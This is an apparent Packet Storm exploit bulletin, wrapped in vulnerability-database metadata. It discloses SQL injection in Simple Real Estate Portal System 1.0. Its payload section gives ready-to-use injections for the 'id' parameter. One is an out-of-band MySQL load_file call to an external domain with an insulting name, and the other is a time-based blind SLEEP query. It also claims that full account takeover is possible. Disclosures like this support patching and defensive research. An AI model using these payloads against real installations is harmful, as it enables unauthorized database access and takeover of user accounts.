Simple Real Estate Portal System 1.0 SQL Injection

2022-02-21T00:00:00

Description

{"id": "PACKETSTORM:166078", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Simple Real Estate Portal System 1.0 SQL Injection", "description": "", "published": "2022-02-21T00:00:00", "modified": "2022-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166078/Simple-Real-Estate-Portal-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-21T16:07:19", "viewCount": 56, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "vulnersScore": 0.1}, "_state": {"dependencies": 1646295998, "score": 1659855189}, "_internal": {"score_hash": "589ff3e57f6b032b4d37cad20264434e"}, "sourceHref": "https://packetstormsecurity.com/files/download/166078/sreps10-sql.txt", "sourceData": "`## Title: Simple Real Estate Portal System v1.0 remote SQL-Injections \n## Author: nu11secur1ty \n## Date: 02.20.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html \n \n \n## Description: \nThe id parameter appears to be vulnerable to SQL injection attacks. \nThe payload '+(select \nload_file('\\\\\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.http://stupid_asshole.com\\\\foh'))+' \nwas submitted in the id parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file \nfunction with a UNC file path that references a URL on an external \ndomain. \nThe application interacted with that domain, indicating that the \ninjected SQL query was executed. \nThe attacker from outside can take control of all accounts of this \nsystem by using this vulnerability! \nWARNING: If this is in some external domain, or some subdomain, or \ninternal, this will be extremely dangerous! \nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: id (GET) \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: p=view_estate&id=2'+(select \nload_file('\\\\\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html\\\\foh'))+'' \nAND (SELECT 2183 FROM (SELECT(SLEEP(3)))uXKK) AND 'NnWW'='NnWW \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Simple-Real-Estate-Portal-System) \n \n## Proof and Exploit: \n[href](https://streamable.com/lffled) \n \n \n`\n"}